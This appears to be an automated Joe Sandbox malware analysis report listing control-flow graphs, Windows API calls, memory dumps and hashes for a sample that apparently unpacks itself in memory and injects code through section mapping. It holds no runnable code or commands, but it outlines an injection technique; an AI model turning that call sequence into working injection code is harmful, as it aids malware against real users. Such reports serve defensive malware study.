                                                                                control_flow_graph 290 401620-40165a 297 40165d-401670 call 4012a9 290->297 298 40164e-401656 290->298 301 401672 297->301 302 401675-40167a 297->302 298->297 301->302 304 401680-401691 302->304 305 401991-401999 302->305 308 401697-4016c0 304->308 309 40198f-4019e0 call 4012a9 304->309 305->302 308->309 316 4016c6-4016dd NtDuplicateObject 308->316 316->309 319 4016e3-401707 NtCreateSection 316->319 321 401763-401789 NtCreateSection 319->321 322 401709-40172a NtMapViewOfSection 319->322 321->309 324 40178f-401793 321->324 322->321 325 40172c-401748 NtMapViewOfSection 322->325 324->309 326 401799-4017ba NtMapViewOfSection 324->326 325->321 328 40174a-401760 325->328 326->309 330 4017c0-4017dc NtMapViewOfSection 326->330 328->321 330->309 333 4017e2 call 4017e7 330->333
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                                                • Instruction ID: 248f23169df6d57de1173162bb8fcbefd5e68f0f1e7bb912041edb2cf68793e3
                                                                                • Opcode Fuzzy Hash: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                                                • Instruction Fuzzy Hash: 11512AB0900245BFEB208F91CC48FAFBBB8FF85B00F14016AF911BA2E5D6759941CB24
                                                                                Function 00401658 Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 336 401658-401670 call 4012a9 340 401672 336->340 341 401675-40167a 336->341 340->341 343 401680-401691 341->343 344 401991-401999 341->344 347 401697-4016c0 343->347 348 40198f-4019e0 call 4012a9 343->348 344->341 347->348 355 4016c6-4016dd NtDuplicateObject 347->355 355->348 358 4016e3-401707 NtCreateSection 355->358 360 401763-401789 NtCreateSection 358->360 361 401709-40172a NtMapViewOfSection 358->361 360->348 363 40178f-401793 360->363 361->360 364 40172c-401748 NtMapViewOfSection 361->364 363->348 365 401799-4017ba NtMapViewOfSection 363->365 364->360 367 40174a-401760 364->367 365->348 369 4017c0-4017dc NtMapViewOfSection 365->369 367->360 369->348 372 4017e2 call 4017e7 369->372
                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0
                                                                                • Opcode ID: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                                                • Instruction ID: 4b61e56e2161a851a120027933825f601e9725a76b72e0f731e8dd48e05b5e19
                                                                                • Opcode Fuzzy Hash: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                                                • Instruction Fuzzy Hash: FC51F7B5900249BFEF209F91CC88FAFBBB9FF85B10F100159F911AA2A5D6749944CB24
                                                                                Function 02EF20CD Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 375 2ef20cd-2ef20e6 376 2ef20e8-2ef20ea 375->376 377 2ef20ec 376->377 378 2ef20f1-2ef20fd CreateToolhelp32Snapshot 376->378 377->378 379 2ef20ff-2ef2105 378->379 380 2ef210d-2ef211a Module32First 378->380 379->380 385 2ef2107-2ef210b 379->385 381 2ef211c-2ef211d call 2ef1d8c 380->381 382 2ef2123-2ef212b 380->382 386 2ef2122 381->386 385->376 385->380 386->382
                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02EF20F5
                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 02EF2115
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2eeb000_4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 3833638111-0
                                                                                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction ID: 9e42526f81f94c25a4d085aa2d62e206a554cef566b090390044dd48331058ee
                                                                                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                • Instruction Fuzzy Hash: 19F0F632140714ABD7603BF4AC8CB6F72E8EF49369F105528FB42954C0CB70E8458A65
                                                                                Function 02DD003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 2dd003c-2dd0047 1 2dd004c-2dd0263 call 2dd0a3f call 2dd0e0f call 2dd0d90 VirtualAlloc 0->1 2 2dd0049 0->2 17 2dd028b-2dd0292 1->17 18 2dd0265-2dd0289 call 2dd0a69 1->18 2->1 20 2dd02a1-2dd02b0 17->20 21 2dd02ce-2dd03c2 VirtualProtect call 2dd0cce call 2dd0ce7 18->21 20->21 22 2dd02b2-2dd02cc 20->22 29 2dd03d1-2dd03e0 21->29 22->20 30 2dd0439-2dd04b8 VirtualFree 29->30 31 2dd03e2-2dd0437 call 2dd0ce7 29->31 33 2dd04be-2dd04cd 30->33 34 2dd05f4-2dd05fe 30->34 31->29 38 2dd04d3-2dd04dd 33->38 35 2dd077f-2dd0789 34->35 36 2dd0604-2dd060d 34->36 42 2dd078b-2dd07a3 35->42 43 2dd07a6-2dd07b0 35->43 36->35 39 2dd0613-2dd0637 36->39 38->34 41 2dd04e3-2dd0505 38->41 46 2dd063e-2dd0648 39->46 50 2dd0517-2dd0520 41->50 51 2dd0507-2dd0515 41->51 42->43 44 2dd086e-2dd08be LoadLibraryA 43->44 45 2dd07b6-2dd07cb 43->45 55 2dd08c7-2dd08f9 44->55 48 2dd07d2-2dd07d5 45->48 46->35 49 2dd064e-2dd065a 46->49 52 2dd0824-2dd0833 48->52 53 2dd07d7-2dd07e0 48->53 49->35 54 2dd0660-2dd066a 49->54 58 2dd0526-2dd0547 50->58 51->58 62 2dd0839-2dd083c 52->62 59 2dd07e4-2dd0822 53->59 60 2dd07e2 53->60 61 2dd067a-2dd0689 54->61 56 2dd08fb-2dd0901 55->56 57 2dd0902-2dd091d 55->57 56->57 63 2dd054d-2dd0550 58->63 59->48 60->52 64 2dd068f-2dd06b2 61->64 65 2dd0750-2dd077a 61->65 62->44 66 2dd083e-2dd0847 62->66 68 2dd0556-2dd056b 63->68 69 2dd05e0-2dd05ef 63->69 70 2dd06ef-2dd06fc 64->70 71 2dd06b4-2dd06ed 64->71 65->46 72 2dd0849 66->72 73 2dd084b-2dd086c 66->73 74 2dd056d 68->74 75 2dd056f-2dd057a 68->75 69->38 76 2dd06fe-2dd0748 70->76 77 2dd074b 70->77 71->70 72->44 73->62 74->69 78 2dd057c-2dd0599 75->78 79 2dd059b-2dd05bb 75->79 76->77 77->61 84 2dd05bd-2dd05db 78->84 79->84 84->63
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02DD024D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2dd0000_4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: cess$kernel32.dll
                                                                                • API String ID: 4275171209-1230238691
                                                                                • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction ID: 6442db1ce86847e1f326e5f57c16d2b02f03cabe572a302aa15fd13724bbde57
                                                                                • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                • Instruction Fuzzy Hash: A0525874A01229DFDB64CF68C984BA8BBB1BF49315F1480D9E94DAB351DB30AE85CF14
                                                                                Function 02DD0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 388 2dd0e0f-2dd0e24 SetErrorMode * 2 389 2dd0e2b-2dd0e2c 388->389 390 2dd0e26 388->390 390->389
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,02DD0223,?,?), ref: 02DD0E19
                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,02DD0223,?,?), ref: 02DD0E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2dd0000_4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction ID: b6fab635391f5d5960d73426a3f2a9315aa2bd9bf91612d8eaf5c500890f6fc4
                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                • Instruction Fuzzy Hash: 51D0123114512877D7002AA4DC09BCD7B1CDF05B67F008011FB0DD9180C770994046E5
                                                                                Function 00401A01 Relevance: 1.3, APIs: 1, Instructions: 90sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 391 401a01-401a02 392 401a04-401a05 391->392 393 401a60 392->393 394 401a06-401a48 call 4012a9 Sleep call 401524 392->394 395 401a62 393->395 396 4019f8-401a0b 393->396 406 401a57-401a6f 394->406 426 401a4a-401a52 call 401615 394->426 398 401a53 395->398 399 401a64 395->399 396->392 398->406 403 401a66-401a6b 399->403 404 401ace-401b1c call 4012a9 399->404 409 401a72-401aa7 call 4012a9 403->409 433 401b21 404->433 406->409 418 401a65-401a6b 406->418 418->409 426->398 433->433
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                                                • Instruction ID: 81c5b6d8da752c85ef5c48e217346158da0f95f2e0f30d6723e854e1366495a5
                                                                                • Opcode Fuzzy Hash: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                                                • Instruction Fuzzy Hash: AE21383234E201EBDB009B90AD419BA3315AB85714F34467BF5137A1F2C63E99436F6B
                                                                                Function 004019E3 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 434 4019e3-4019fc 436 4019f3 434->436 437 4019ff-401a0b 434->437 439 4019f8 436->439 441 401a60 437->441 442 401a06-401a48 call 4012a9 Sleep call 401524 437->442 439->437 441->439 443 401a62 441->443 451 401a57-401a6f 442->451 471 401a4a-401a52 call 401615 442->471 445 401a53 443->445 446 401a64 443->446 445->451 448 401a66-401a6b 446->448 449 401ace-401b1c call 4012a9 446->449 454 401a72-401aa7 call 4012a9 448->454 478 401b21 449->478 451->454 463 401a65-401a6b 451->463 463->454 471->445 478->478
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                                                • Instruction ID: 3d34462ae554e6b9c52ec10bfc335e1d4eef14cf0cc07287d36856a9453ce069
                                                                                • Opcode Fuzzy Hash: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
                                                                                • Instruction Fuzzy Hash: AA11E17274A205FBDB00AA949C41EBA3228AB45714F308577BA43780F1D57D8953BF6F
                                                                                Function 004019EE Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 479 4019ee-4019f6 480 4019f8-401a0b 479->480 484 401a60 480->484 485 401a06-401a48 call 4012a9 Sleep call 401524 480->485 484->480 486 401a62 484->486 494 401a57-401a6f 485->494 514 401a4a-401a52 call 401615 485->514 488 401a53 486->488 489 401a64 486->489 488->494 491 401a66-401a6b 489->491 492 401ace-401b1c call 4012a9 489->492 497 401a72-401aa7 call 4012a9 491->497 521 401b21 492->521 494->497 506 401a65-401a6b 494->506 506->497 514->488 521->521
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                                                • Instruction ID: fd11faa5c1113836d14621795cf3d83bd65fd701f71c993b701afff5049cc75c
                                                                                • Opcode Fuzzy Hash: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
                                                                                • Instruction Fuzzy Hash: 27018B3274A201EBDB009A949C42ABA3728AF45714F2045B7BA43B90F1C67D99536F2B
                                                                                Function 004019FA Relevance: 1.3, APIs: 1, Instructions: 58sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 522 4019fa-4019fc 524 4019f3 522->524 525 4019ff-401a0b 522->525 527 4019f8 524->527 529 401a60 525->529 530 401a06-401a48 call 4012a9 Sleep call 401524 525->530 527->525 529->527 531 401a62 529->531 539 401a57-401a6f 530->539 559 401a4a-401a52 call 401615 530->559 533 401a53 531->533 534 401a64 531->534 533->539 536 401a66-401a6b 534->536 537 401ace-401b1c call 4012a9 534->537 542 401a72-401aa7 call 4012a9 536->542 566 401b21 537->566 539->542 551 401a65-401a6b 539->551 551->542 559->533 566->566
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                                                • Instruction ID: 6cc9081dd0b90bd572a9145dab600ca03ca16d67528742debddf3dc55f5ee8c1
                                                                                • Opcode Fuzzy Hash: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
                                                                                • Instruction Fuzzy Hash: 1A01C03274A105EBDB009A949C41EBA3328AB44710F308577BA43790F1C57D8A537F6F
                                                                                Function 00401A09 Relevance: 1.3, APIs: 1, Instructions: 49sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 567 401a09-401a48 call 4012a9 Sleep call 401524 576 401a57-401a6f 567->576 577 401a4a-401a53 call 401615 567->577 582 401a72-401aa7 call 4012a9 576->582 583 401a65-401a6b 576->583 577->576 583->582
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                                                • Instruction ID: 82411e1791d3a8170d7b0096784b0d07359e834b960e05cc8d1eb1f577d4cd17
                                                                                • Opcode Fuzzy Hash: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
                                                                                • Instruction Fuzzy Hash: 90018F3274A205EBDB00AAD4AC42EAA33289F45714F244577FA43B90F1C57D8A536F6B
                                                                                Function 00401A10 Relevance: 1.3, APIs: 1, Instructions: 48sleepCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 592 401a10-401a48 call 4012a9 Sleep call 401524 598 401a57-401a6f 592->598 599 401a4a-401a53 call 401615 592->599 604 401a72-401aa7 call 4012a9 598->604 605 401a65-401a6b 598->605 599->598 605->604
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                • Opcode ID: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                                                • Instruction ID: 961536146c74ce18795349366bfe527767909b26be76020be6548142ac7a4a5b
                                                                                • Opcode Fuzzy Hash: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
                                                                                • Instruction Fuzzy Hash: 47018472705209EBCB00ABD09C42EA933249B45314F644577FA12B90F2D67D89536B2B
                                                                                Function 02EF1D8C Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02EF1DDD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2eeb000_4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction ID: 94cfcace1feaf79fd1ae7c5938ef44198bc828d8d8bcdb22fef8908fbba161bf
                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                • Instruction Fuzzy Hash: 27112D79A40208EFDB01DF98C985E99BBF5AF08350F058094FA489B361D371EA50DF90

                                                                                Non-executed Functions

                                                                                Function 02DD092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2dd0000_4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$GetProcAddress.$l
                                                                                • API String ID: 0-2784972518
                                                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                • Instruction ID: ea34b484494928800d64cb4ab05b23d49e28877cb4dbc089a15e9ab2b5b85233
                                                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                • Instruction Fuzzy Hash: F4314CB6900609DFDB10CF99C880AAEBBF9FF48325F19504AD441A7350D771EA45CFA4
                                                                                Function 02EF19AA Relevance: .1, Instructions: 61COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2eeb000_4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                • Instruction ID: a0ccd1db4c51a365f7fc7ec5c0a9aceeead8aa45830861ba8956d4113032ea2d
                                                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                • Instruction Fuzzy Hash: 99117072380204EFDB84DE55DC80EA673EAEB89324B198155EE08CB311D675E802CB60
                                                                                Function 02DD0D90 Relevance: .0, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2dd0000_4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                • Instruction ID: 10e3ae977d272027bfebde794c1b5235b07639a24cdaed8ed8d2d6ef4922c542
                                                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                • Instruction Fuzzy Hash: F901A276A10A048FDF21CF24C804BAA33F5EBC6317F4984A9D90A97382E774AD41CB90
                                                                                Function 00402A9F Relevance: .0, Instructions: 7COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: de3157a836501db8cf5431811897c06464d213d93ef77bce33c3680fcda06b18
                                                                                • Instruction ID: 0bf335201b4081c8990773322d5bc76c700d8f7add6b30564506a2c4c32383c8
                                                                                • Opcode Fuzzy Hash: de3157a836501db8cf5431811897c06464d213d93ef77bce33c3680fcda06b18
                                                                                • Instruction Fuzzy Hash: 9FB0922878D4A24AC2229B2C84921B9FF22AE57324354859181C04B282E7A848A7D204

                                                                                Execution Graph

                                                                                Execution Coverage:7.6%
                                                                                Dynamic/Decrypted Code Coverage:43.7%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:119
                                                                                Total number of Limit Nodes:5
